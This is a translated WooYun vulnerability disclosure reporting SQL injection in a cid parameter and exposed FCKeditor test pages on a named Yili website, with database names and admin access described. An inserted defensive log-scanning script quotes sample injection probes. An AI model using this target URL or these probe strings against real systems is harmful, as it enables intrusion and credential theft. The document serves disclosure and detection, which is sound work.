
Vulnerability summary

Defect ID: wooyun-2012-014760

Title: Yili SQL injection and FCKeditor test pages

Vendor: Yili

Author: luom

Submitted: 2012-11-14 21:03

Fix time: 2012-12-29 21:03

Published: 2012-12-29 21:03

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2012-11-14: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2012-12-29: the vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

Yili has a SQL injection vulnerability and an FCKeditor vulnerability; exploiting them gives access to the admin backend.

Detailed description:

http://yilibabyclub.yili.com/newslist.php?cid=22
newslist.php does not filter its input (the cid parameter) strictly, which leads to SQL injection.
The FCKeditor file-manager connector test pages are also left reachable:
http://yilibabyclub.yili.com/fckeditor/editor/filemanager/connectors/uploadtest.html
http://yilibabyclub.yili.com/fckeditor/editor/filemanager/connectors/test.html
The injection yields the usernames and (hashed) passwords:

current database:    'aierclub'
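As an added example (not part of the original report), a small log-review script for the two issues described above: it flags requests to the two FCKeditor connector test pages and requests to newslist.php whose cid is not a plain integer, which a category id should always be. The access-log lines and IP addresses are constructed; only the paths come from the report.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (Apache combined format); IPs and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Nov/2012:17:40:01 +0800] "GET /newslist.php?cid=22 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [14/Nov/2012:17:47:23 +0800] "GET /newslist.php?cid=22%20AND%201=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0"
203.0.113.9 - - [14/Nov/2012:17:47:24 +0800] "GET /newslist.php?cid=22%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 500 0 "-" "sqlmap/1.0"
203.0.113.9 - - [14/Nov/2012:17:50:00 +0800] "GET /fckeditor/editor/filemanager/connectors/test.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [14/Nov/2012:17:50:05 +0800] "GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Test pages named in the report; they should not be reachable on a production site at all.
FCK_TEST_PAGES = {
    "/fckeditor/editor/filemanager/connectors/test.html",
    "/fckeditor/editor/filemanager/connectors/uploadtest.html",
}

def classify(line):
    """Return a finding label for one log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m.group("target"))
    if url.path in FCK_TEST_PAGES:
        return "fckeditor_test_page"
    if url.path == "/newslist.php":
        # cid is a numeric category id; parse_qs decodes %xx, so anything non-numeric is a probe.
        cid = parse_qs(url.query).get("cid", [""])[0]
        if not cid.isdigit():
            return "non_numeric_cid"
    return None

def scan(log_text):
    """Return (ip, label, request target) for every suspicious line, in log order."""
    findings = []
    for line in log_text.splitlines():
        label = classify(line)
        if label:
            m = LOG_RE.match(line)
            findings.append((m.group("ip"), label, m.group("target")))
    return findings

if __name__ == "__main__":
    for ip, label, target in scan(SAMPLE_LOG):
        print(f"{ip}\t{label}\t{target}")
```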

Proof of vulnerability:

1.jpg (screenshot)

Admin backend

3.jpg (screenshot)

Fix recommendation:

Make the passwords stronger, the filtering stricter, delete the useless files; you understand this better than I do.

Copyright notice: when reposting, please credit the source: luom@WooYun

Vulnerability response

Vendor response:

Vendor could not be reached, or the vendor actively declined